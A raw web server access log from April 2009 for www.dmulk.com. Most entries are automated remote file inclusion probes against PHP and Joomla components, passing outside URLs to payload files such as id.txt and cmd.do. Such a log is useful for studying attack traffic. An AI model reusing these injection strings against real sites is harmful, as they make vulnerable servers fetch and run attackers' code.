217.8.248.158 - - [02/Apr/2009:10:41:59 -0700] "GET /logs/access_080928.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:10:41:59 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:42:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:42:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.220.4.131 - - [02/Apr/2009:10:42:59 -0700] "GET /logs/access_080905.log//administrator/components/com_virtuemart/classes/Tar.php?mosConfig_absolute_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.220.4.131 - - [02/Apr/2009:10:42:59 -0700] "GET /administrator/components/com_virtuemart/classes/Tar.php?mosConfig_absolute_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.220.4.131 - - [02/Apr/2009:10:43:00 -0700] "GET /logs//administrator/components/com_virtuemart/classes/Tar.php?mosConfig_absolute_path=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:43:05 -0700] "GET /logs/access_080320.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:43:26 -0700] "GET /logs/access_071129.log HTTP/1.0" 200 76564 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:43:34 -0700] "GET /logs/access_080330.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.151.247.1 - - [02/Apr/2009:10:43:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.151.247.1 - - [02/Apr/2009:10:43:42 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.151.247.1 - - [02/Apr/2009:10:43:42 -0700] "GET /logs/access_080320.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.151.247.1 - - [02/Apr/2009:10:44:05 -0700] "GET /logs/access_080330.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://traviswindowandblindcleaning.com/indeks1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.220.64.3 - - [02/Apr/2009:10:44:18 -0700] "GET /logs/access_090208.log//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [02/Apr/2009:10:44:18 -0700] "GET /logs//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:18 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:18 -0700] "GET /logs/access_090206.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:18 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:20 -0700] "GET /logs/access_090206.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:20 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:20 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.220.64.3 - - [02/Apr/2009:10:44:20 -0700] "GET /logs/access_080320.log//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:44:27 -0700] "GET /logs/access_080712.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:44:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:44:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.236.100 - - [02/Apr/2009:10:44:28 -0700] "GET /logs/access_080307.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:10:44:39 -0700] "GET /logs/access_090318.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pignoli.org//root/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:45 -0700] "GET /logs/access_081104.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:45 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:49 -0700] "GET /logs/access_081104.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:49 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:44:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.94.112 - - [02/Apr/2009:10:45:02 -0700] "GET /logs/access_081016.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://pignoli.org//root/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:45:04 -0700] "GET /logs/access_071116.log HTTP/1.0" 200 80772 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:45:21 -0700] "GET /logs/access_081117.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:45:26 -0700] "GET /logs/access_081117.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:45:31 -0700] "GET /logs/access_090318.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:45:54 -0700] "GET /bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:45:54 -0700] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:45:54 -0700] "GET /logs/access_090205.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:45:54 -0700] "GET /logs/access_080727.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:46:09 -0700] "GET /logs/access_090318.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:10:47:17 -0700] "GET /logs/access_081220.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.8.248.158 - - [02/Apr/2009:10:47:17 -0700] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:47:22 -0700] "GET /logs/access_080727.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:47:22 -0700] "GET /logs/access_090205.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:47:22 -0700] "GET /bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:47:22 -0700] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:10:47:25 -0700] "GET /logs/access_090201.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:10:47:25 -0700] "GET /kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:10:47:25 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [02/Apr/2009:10:47:36 -0700] "GET /logs/access_090203.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:52 -0700] "GET /logs/access_090318.log%20%20//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:52 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:52 -0700] "GET /logs/access_090206.log%20%20//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:52 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:53 -0700] "GET /logs/access_090206.log%20%20//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:53 -0700] "GET /logs/access_090318.log%20%20//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:53 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:47:53 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:47:54 -0700] "GET /bikes/dteel/2008_02_07/?D=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:48:07 -0700] "GET /logs/access_081017.log/?site_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:48:08 -0700] "GET /logs/?site_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 200 93470 "-" "libwww-perl/5.65" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:48:12 -0700] "GET /?site_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 200 65555 "-" "libwww-perl/5.65" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /logs/access_081104.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /logs/access_081104.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /logs/access_081104.log/administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:24 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /logs/access_081104.log/administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.194.27.141 - - [02/Apr/2009:10:48:25 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.champrond-en-gatine.org/components/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.170.122.72 - - [02/Apr/2009:10:48:28 -0700] "GET /logs/access_081204.log/?site_path=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:30 -0700] "GET /logs/access_080727.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:30 -0700] "GET /logs/access_090205.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:30 -0700] "GET /bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:30 -0700] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:48:34 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:48:34 -0700] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:48:34 -0700] "GET /logs/access_081018.log%20%20//yabbse/Sources/Packages.php?sourcedir=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:37 -0700] "GET /logs/access_080727.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:37 -0700] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:38 -0700] "GET /logs/access_090205.log//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:48:38 -0700] "GET /bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:48:41 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:48:41 -0700] "GET /logs/access_090205.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:48:44 -0700] "GET /logs/access_090206.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:48:46 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:48:57 -0700] "GET /logs/access_080727.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:49:15 -0700] "GET /logs/access_081211.log HTTP/1.0" 200 3192649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.118.85.13 - - [02/Apr/2009:10:50:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.118.85.13 - - [02/Apr/2009:10:50:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.118.85.13 - - [02/Apr/2009:10:50:03 -0700] "GET /logs/access_080320.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:04 -0700] "GET /logs/access_081018.log//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:04 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:04 -0700] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:50:12 -0700] "GET /logs/access_090318.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:14 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:14 -0700] "GET /logs/access_090114.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:14 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:50:16 -0700] "GET /logs/access_090205.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.118.85.13 - - [02/Apr/2009:10:50:27 -0700] "GET /logs/access_080330.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.244 - - [02/Apr/2009:10:50:29 -0700] "GET /logs/access_080727.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:34 -0700] "GET /logs/access_090225.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:34 -0700] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:34 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:50:34 -0700] "GET /logs/access_081018.log//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
